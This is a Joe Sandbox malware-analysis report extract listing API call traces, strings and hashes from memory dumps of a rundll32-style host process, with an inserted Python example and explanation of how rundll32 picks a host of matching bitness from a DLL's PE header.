                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                 • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentFormatMessageThread
                                                                                                                • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                                                                • API String ID: 2411632146-3173542853
                                                                                                                • Opcode ID: 6916cfa6827ff92fbbff5a14e19bc5844cb2390b2f8dd2d66b680680196907d0
                                                                                                                • Instruction ID: 66791140660ac3f9e4e86b6fcacbff341fe5f58ddfea1ee4668a0fe6df921a79
                                                                                                                • Opcode Fuzzy Hash: 6916cfa6827ff92fbbff5a14e19bc5844cb2390b2f8dd2d66b680680196907d0
                                                                                                                • Instruction Fuzzy Hash: F5512671600300BBDB309F658C09FEB76F9EB59704F046A9DF306B21A2DA7299E4CB51
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00E13A51: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00E13A7B
                                                                                                                  • Part of subcall function 00E13A51: memset.MSVCRT ref: 00E13A8F
                                                                                                                  • Part of subcall function 00E13A51: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000040,?,00000000,00000000), ref: 00E13AA6
                                                                                                                  • Part of subcall function 00E13A51: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000), ref: 00E13AC1
                                                                                                                  • Part of subcall function 00E13A51: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,000000F8,?,00000000), ref: 00E13AE1
                                                                                                                  • Part of subcall function 00E13A51: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00E13AF3
                                                                                                                • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 00E13B39
                                                                                                                • IsWow64Process2.API-MS-WIN-CORE-WOW64-L1-1-1(00000000), ref: 00E13B40
                                                                                                                • GetSystemDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,000000F6), ref: 00E13B6C
                                                                                                                • PathCchAppend.API-MS-WIN-CORE-PATH-L1-1-0(?,00000105,rundll32.exe), ref: 00E13B87
                                                                                                                • RtlWow64IsWowGuestMachineSupported.NTDLL ref: 00E13BA9
                                                                                                                • GetSystemWow64Directory2W.API-MS-WIN-CORE-WOW64-L1-1-1(?,000000F6,?), ref: 00E13BC9
                                                                                                                • Wow64EnableWow64FsRedirection.API-MS-WIN-CORE-KERNEL32-PRIVATE-L1-1-0(00000000), ref: 00E13BD4
                                                                                                                • memset.MSVCRT ref: 00E13BE6
                                                                                                                • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00E13C08
                                                                                                                • CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000), ref: 00E13C16
                                                                                                                • Wow64EnableWow64FsRedirection.API-MS-WIN-CORE-KERNEL32-PRIVATE-L1-1-0(00000001), ref: 00E13C20
                                                                                                                • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000FF), ref: 00E13C36
                                                                                                                • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00E13C44
                                                                                                                • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00E13C50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                 • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Wow64$File$CloseHandle$CreateEnableProcessReadRedirectionSystemmemset$AppendCommandCurrentDirectoryDirectory2GuestLineMachineObjectPathPointerProcess2SingleSupportedWait
                                                                                                                • String ID: rundll32.exe
                                                                                                                • API String ID: 1294557600-3034741169
                                                                                                                • Opcode ID: d4f45e43263cb4374a23ee49192e36b297ed7a2e21aaa097fc1da9b14681d4c2
                                                                                                                • Instruction ID: 7e9a7c4eeeee4aa5d3c5ff9f6babe55f97b23f2f156e639d03dbbd171eaa68fa
                                                                                                                • Opcode Fuzzy Hash: d4f45e43263cb4374a23ee49192e36b297ed7a2e21aaa097fc1da9b14681d4c2
                                                                                                                • Instruction Fuzzy Hash: 4B314F72A01129ABDB219F719C8DFEA77BDAB04700F0541A5E50AF2051EB349FC9DB50
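The API sequence of the function above (CreateFileW, a 0x40-byte ReadFile, SetFilePointer, a 0xF8-byte ReadFile, then IsWow64Process2, GetSystemDirectoryW / GetSystemWow64Directory2W, PathCchAppend with "rundll32.exe" and CreateProcessW with the current command line) is what a rundll32-style host does when it inspects a DLL's PE header and re-launches itself with the rundll32.exe of matching bitness. The Python below is an added example written for this page, not code from the report, from the sample or from rundll32.exe. It assumes that the 0x40-byte read is IMAGE_DOS_HEADER, that the 0xF8-byte read at e_lfanew is IMAGE_NT_HEADERS32, that IMAGE_FILE_HEADER.Machine selects System32 versus SysWOW64, and that the `_wtoi` seen in subcall 00E13D62 handles the `#ordinal` entry-point form; the directory paths and the `<dll>,<entry> [args]` parsing are illustrative, and the sample PE header is constructed inline.

```python
# Added example (not code from the report or from rundll32 itself): a Python
# re-implementation of what the traced API sequence suggests the function does.
# Assumptions: the 0x40-byte read is IMAGE_DOS_HEADER, the 0xF8-byte read at
# e_lfanew is IMAGE_NT_HEADERS32, and IMAGE_FILE_HEADER.Machine decides whether
# the 32-bit (SysWOW64) or 64-bit (System32) rundll32.exe should host the DLL.
import struct
from dataclasses import dataclass
from typing import Optional

IMAGE_DOS_SIGNATURE = 0x5A4D      # "MZ"
IMAGE_NT_SIGNATURE = 0x00004550   # "PE\0\0"
IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
DOS_HEADER_SIZE = 0x40            # size of the first ReadFile in the trace
NT_HEADERS32_SIZE = 0xF8          # size of the second ReadFile in the trace


@dataclass
class RunDllTarget:
    dll: str
    entry_name: Optional[str]   # export name, or None when an ordinal is used
    ordinal: Optional[int]      # "#123" form: the trace's _wtoi, then GetProcAddress
    args: str


def parse_target(cmdline: str) -> RunDllTarget:
    """Split the rundll32 argument '<dll>,<entry> [args]' into its parts.

    The DLL path may be double-quoted; the entry point ends at the first
    whitespace and everything after it is handed to the entry as a string.
    """
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.index('"', 1)                 # ValueError if the quote is unclosed
        dll, rest = s[1:end], s[end + 1:]
    else:
        comma = s.find(",")
        if comma < 0:
            raise ValueError("expected '<dll>,<entrypoint>'")
        dll, rest = s[:comma], s[comma:]
    if not rest.startswith(","):
        raise ValueError("expected ',' after the DLL path")
    parts = rest[1:].split(None, 1)
    if not parts or not parts[0]:
        raise ValueError("missing entry point")
    entry, args = parts[0], (parts[1] if len(parts) > 1 else "")
    if entry.startswith("#"):
        # Ordinal export: converted with _wtoi and passed to GetProcAddress
        # as an integer instead of a name (assumed from the trace).
        return RunDllTarget(dll, None, int(entry[1:]), args)
    return RunDllTarget(dll, entry, None, args)


def pe_machine(data: bytes) -> Optional[int]:
    """Return IMAGE_FILE_HEADER.Machine, or None if data is not a PE image.

    Mirrors the trace: read 0x40 bytes, seek to e_lfanew, read 0xF8 bytes.
    """
    if len(data) < DOS_HEADER_SIZE:
        return None
    (e_magic,) = struct.unpack_from("<H", data, 0)
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_magic != IMAGE_DOS_SIGNATURE:
        return None
    nt = data[e_lfanew:e_lfanew + NT_HEADERS32_SIZE]
    if len(nt) < NT_HEADERS32_SIZE:
        return None
    signature, machine = struct.unpack_from("<IH", nt, 0)
    if signature != IMAGE_NT_SIGNATURE:
        return None
    return machine


def pick_host(machine: int,
              system32: str = r"C:\Windows\System32",
              syswow64: str = r"C:\Windows\SysWOW64") -> str:
    """Choose the rundll32.exe whose bitness matches the DLL (assumed rule,
    64-bit Windows only). The paths are illustrative defaults; the real code
    asks GetSystemDirectoryW / GetSystemWow64Directory2W."""
    if machine == IMAGE_FILE_MACHINE_I386:
        return syswow64 + r"\rundll32.exe"
    if machine == IMAGE_FILE_MACHINE_AMD64:
        return system32 + r"\rundll32.exe"
    raise ValueError(f"unsupported machine type 0x{machine:04X}")


def build_min_pe(machine: int) -> bytes:
    """Constructed sample input: the smallest header layout pe_machine accepts."""
    dos = bytearray(DOS_HEADER_SIZE)
    struct.pack_into("<H", dos, 0, IMAGE_DOS_SIGNATURE)
    struct.pack_into("<I", dos, 0x3C, DOS_HEADER_SIZE)   # e_lfanew right after the DOS header
    nt = bytearray(NT_HEADERS32_SIZE)
    struct.pack_into("<IH", nt, 0, IMAGE_NT_SIGNATURE, machine)
    return bytes(dos + nt)


if __name__ == "__main__":
    target = parse_target(r'"C:\Windows\System32\shell32.dll",Control_RunDLL inetcpl.cpl')
    machine = pe_machine(build_min_pe(IMAGE_FILE_MACHINE_I386))
    print(target, hex(machine), pick_host(machine))
```

For triage this matters because the Machine check explains why a 32-bit sample that invokes rundll32 on a 64-bit host ends up with a second rundll32.exe process from SysWOW64: the re-launch is the host's own behaviour, not an injection step by the malware, and the WaitForSingleObject at the end of the trace shows the first instance simply waits for it to finish.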
                                                                                                                APIs
                                                                                                                • CoInitializeEx.API-MS-WIN-CORE-COM-L1-1-0(00000000,00000002), ref: 00E137D4
                                                                                                                • CoInitializeSecurity.API-MS-WIN-CORE-COM-L1-1-0(00E119CC,00000000,00000000,00000000,00000000,00000000,00000000,00000008,00000000), ref: 00E137F0
                                                                                                                • CoUninitialize.API-MS-WIN-CORE-COM-L1-1-0 ref: 00E138E7
                                                                                                                  • Part of subcall function 00E1205A: CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(00E1161C,00000000,00000001,00E11940,?), ref: 00E12072
                                                                                                                • CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000001,00000000,00000000), ref: 00E13808
                                                                                                                • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00E1381D
                                                                                                                  • Part of subcall function 00E153AD: InitOnceExecuteOnce.API-MS-WIN-CORE-SYNCH-L1-2-0(00E184A4,00E153D0,00000000,00000000,00E1382A), ref: 00E153BB
                                                                                                                • CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,?), ref: 00E13866
                                                                                                                • SetEvent.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00E13873
                                                                                                                • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00E1387A
                                                                                                                • CoWaitForMultipleHandles.API-MS-WIN-CORE-COM-L1-1-0(00000000,00007530,00000001,00E18420,?), ref: 00E13897
                                                                                                                • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00E138D9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                 • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateEvent$CloseHandleInitializeOnce$CurrentExecuteHandlesInitInstanceMultipleSecurityThreadUninitializeWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 2536006573-0
                                                                                                                • Opcode ID: 792eafabc6bba838ac250b4c2223580624d4f7c85561604e3c8429f3dc4cfaaf
                                                                                                                • Instruction ID: 22bc03e2a6917546130d14c3044dcc113dd0e2cea00550fa17f7b297b7119194
                                                                                                                • Opcode Fuzzy Hash: 792eafabc6bba838ac250b4c2223580624d4f7c85561604e3c8429f3dc4cfaaf
                                                                                                                • Instruction Fuzzy Hash: 853184B1600305EFE7046FB2AD8DEEE7AADFB487497049029F516F2191DFB4D9888721
                                                                                                                APIs
                                                                                                                • LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,000000C8), ref: 00E1391E
                                                                                                                • LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000402,?,000000C8,?,000000C8), ref: 00E13963
                                                                                                                • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(CONOUT$,C0000000,00000003,00000000,00000003,00000000,00000000,?,00000402,?,000000C8,?,000000C8), ref: 00E13992
                                                                                                                • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000001,?,?,?,00000000,?,00000402,?,000000C8,?,000000C8), ref: 00E139D0
                                                                                                                • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000001,00E11844,00000002,?,00000000,?,00000402,?,000000C8,?,000000C8), ref: 00E139E6
                                                                                                                • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000001,?,?,?,00000000,?,00000402,?,000000C8,?,000000C8), ref: 00E13A15
                                                                                                                • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000001,?,00000402,?,000000C8,?,000000C8), ref: 00E13A1C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ConsoleWrite$LoadString$CloseCreateFileHandle
                                                                                                                • String ID: CONOUT$
                                                                                                                • API String ID: 258192622-3130406586
                                                                                                                • Opcode ID: c6b9f07a532e886a46f27c1372232a79b8313b1b267bff60f52963d876fa26c2
                                                                                                                • Instruction ID: 7ce33db16dc779f84aa7a45f206e573d633720a59f17f7f06223d0dc89ec6d0f
                                                                                                                • Opcode Fuzzy Hash: c6b9f07a532e886a46f27c1372232a79b8313b1b267bff60f52963d876fa26c2
                                                                                                                • Instruction Fuzzy Hash: F8319331500119AFEB20DB25CD55FEB77BCEF49705F048095FA0AB6181E670AB49CE60
                                                                                                                APIs
                                                                                                                • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00E13431
                                                                                                                • DecodePointer.API-MS-WIN-CORE-UTIL-L1-1-0(?), ref: 00E13443
                                                                                                                • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00E1346A
                                                                                                                • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00E1347C
                                                                                                                • AcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00E134CF
                                                                                                                • EncodePointer.API-MS-WIN-CORE-UTIL-L1-1-0(?), ref: 00E134E1
                                                                                                                • DecodePointer.API-MS-WIN-CORE-UTIL-L1-1-0(00000000), ref: 00E134EF
                                                                                                                • ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(?), ref: 00E1350F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Lock$PointerReleaseShared$AcquireDecodeExclusive$Encode
                                                                                                                • String ID:
                                                                                                                • API String ID: 3770696666-0
                                                                                                                • Opcode ID: 3d47986642877ba1033fa486805d9d3c3b2666693b932519922dc825d93bbc18
                                                                                                                • Instruction ID: 05a6c338c4d05feecafcb7c389b22679a57f1c0044265b0d1d01be5828ff784e
                                                                                                                • Opcode Fuzzy Hash: 3d47986642877ba1033fa486805d9d3c3b2666693b932519922dc825d93bbc18
                                                                                                                • Instruction Fuzzy Hash: 41414935A00228EFCB05CF65D8988ADBBBAFF49B147158099E916F7321DB30AE41CB50
                                                                                                                APIs
                                                                                                                • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?), ref: 00E12B6D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ObjectSingleWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 24740636-0
                                                                                                                • Opcode ID: 436114e046c1bf0a640aa817a191b2127b5df7f13fa9fe598bdc9019383124e0
                                                                                                                • Instruction ID: 0add149a35da1b60952993ea2835edac84085e316784408b8be8db56aa1f1ee6
                                                                                                                • Opcode Fuzzy Hash: 436114e046c1bf0a640aa817a191b2127b5df7f13fa9fe598bdc9019383124e0
                                                                                                                • Instruction Fuzzy Hash: 4931917070410AABEB205E66DC88BEF7769EF41358F209039F712F6281D774CDE69692
                                                                                                                APIs
                                                                                                                • _wtoi.MSVCRT(?), ref: 00E13D94
                                                                                                                • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?), ref: 00E13DA0
                                                                                                                • LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?), ref: 00E13DD3
                                                                                                                • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000400,?,?,00000000,?,00000000,00000000), ref: 00E13DF1
                                                                                                                • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00E13E13
                                                                                                                • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00E13E30
                                                                                                                • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00E13E43
                                                                                                                • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,00000000,?,00000000,00000000), ref: 00E13E4C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Local$AllocByteCharFreeMultiWide_wtoi
                                                                                                                • String ID:
                                                                                                                • API String ID: 3528786098-0
                                                                                                                • Opcode ID: e6a8c2e41e977ffe783a81075f720945458c185daaa24222c800a0c695f21523
                                                                                                                • Instruction ID: 809e8abf10fd7144da5f91f83b5b7b87252c443fd0214b392c25fd367304743b
                                                                                                                • Opcode Fuzzy Hash: e6a8c2e41e977ffe783a81075f720945458c185daaa24222c800a0c695f21523
                                                                                                                • Instruction Fuzzy Hash: E531BF79600212EFCB214F65DC589EBBFB9EF497147148169FD06E3251D7708E45C6A0
                                                                                                                APIs
                                                                                                                • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00E13A7B
                                                                                                                • memset.MSVCRT ref: 00E13A8F
                                                                                                                • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000040,?,00000000,00000000), ref: 00E13AA6
                                                                                                                • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000), ref: 00E13AC1
                                                                                                                • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,000000F8,?,00000000), ref: 00E13AE1
                                                                                                                • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00E13AF3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Read$CloseCreateHandlePointermemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3827546496-0
                                                                                                                • Opcode ID: e7fd4b39a804c15b3e9239b9d382525ef5f3d4b81c363faf671282b895b4f964
                                                                                                                • Instruction ID: dc2958efb9da8f21a76deae9b8c93cbd8b9a86d442dd618948ee603d9d866cc8
                                                                                                                • Opcode Fuzzy Hash: e7fd4b39a804c15b3e9239b9d382525ef5f3d4b81c363faf671282b895b4f964
                                                                                                                • Instruction Fuzzy Hash: BB1193356001247BD7209B669C49FEF7B7CEF45720F004154FA18F20D0EA748A89CA61
                                                                                                                APIs
                                                                                                                • CharNextW.API-MS-WIN-CORE-STRING-L2-1-0(?,00000000,?,00000000,?), ref: 00E15885
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharNext
                                                                                                                • String ID: /$localserver$sta
                                                                                                                • API String ID: 3213498283-3694077230
                                                                                                                • Opcode ID: a8b02addacd83a943a3e92ddef04de22d194b8f486f2a6b2f03eb39dd6952af5
                                                                                                                • Instruction ID: 039878abd93e49c1574dbdd5e6c195331244f5aa834c9940c94d60a6919c5793
                                                                                                                • Opcode Fuzzy Hash: a8b02addacd83a943a3e92ddef04de22d194b8f486f2a6b2f03eb39dd6952af5
                                                                                                                • Instruction Fuzzy Hash: D471A07AA00616DBCF24DF5984112F9B3F1EFD8758BA4546AE895FB2C0EA708EC1C750
                                                                                                                APIs
                                                                                                                • RoOriginateError.API-MS-WIN-CORE-WINRT-ERROR-L1-1-0(80040111,?), ref: 00E155D9
                                                                                                                  • Part of subcall function 00E133F9: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00E13431
                                                                                                                  • Part of subcall function 00E133F9: DecodePointer.API-MS-WIN-CORE-UTIL-L1-1-0(?), ref: 00E13443
                                                                                                                  • Part of subcall function 00E133F9: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00E1346A
                                                                                                                • RoOriginateErrorW.API-MS-WIN-CORE-WINRT-ERROR-L1-1-0(80070057,00000012,?), ref: 00E15616
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLockOriginateShared$AcquireDecodePointerRelease
                                                                                                                • String ID: ?i$activatibleClassId
                                                                                                                • API String ID: 3068322146-27705284
                                                                                                                • Opcode ID: a1fc1db2f4460dff51c90d9353501a4b6bcbe197e32a6e160886656e60fbdfb2
                                                                                                                • Instruction ID: 201ba0dd5dbf5025ac2e6cc36f9f523bf6f2b2650400443b666918fec0e3f416
                                                                                                                • Opcode Fuzzy Hash: a1fc1db2f4460dff51c90d9353501a4b6bcbe197e32a6e160886656e60fbdfb2
                                                                                                                • Instruction Fuzzy Hash: 7C41CE72A10618EFCB14DF65EC44AEEB7BBFF88710B514015E802B7251DB31AD81CBA0
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernelbase.dll), ref: 00E124EB
                                                                                                                • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RaiseFailFastException), ref: 00E124F7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                • String ID: RaiseFailFastException$kernelbase.dll
                                                                                                                • API String ID: 1646373207-919018592
                                                                                                                • Opcode ID: 74c5670d4f5c2b038e44e7e5b5c6cd562ad531efa8520e686469aefc5f70af7f
                                                                                                                • Instruction ID: cefb22ed7c5a9150cbdb607e60550ea245899a29fb28321ead39ec724b18744a
                                                                                                                • Opcode Fuzzy Hash: 74c5670d4f5c2b038e44e7e5b5c6cd562ad531efa8520e686469aefc5f70af7f
                                                                                                                • Instruction Fuzzy Hash: F7E01D36540329BF8F111FA2DC1CDCF7F2AEB497A17008451FE0972261CA318954D7E1
                                                                                                                APIs
                                                                                                                • AcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00E13381
                                                                                                                • ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00E1339A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExclusiveLock$AcquireRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 17069307-0
APIs
• CoInitializeEx.API-MS-WIN-CORE-COM-L1-1-0(00000000,00000006), ref: 00E14003
• CLSIDFromString.API-MS-WIN-CORE-COM-L1-1-0(?,?), ref: 00E14012
• CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(?,00000000,00000001,00E11970,?,?,?), ref: 00E1402D
• CoUninitialize.API-MS-WIN-CORE-COM-L1-1-0(?,?), ref: 00E1405E
Memory Dump Source
• Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
• Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
Similarity
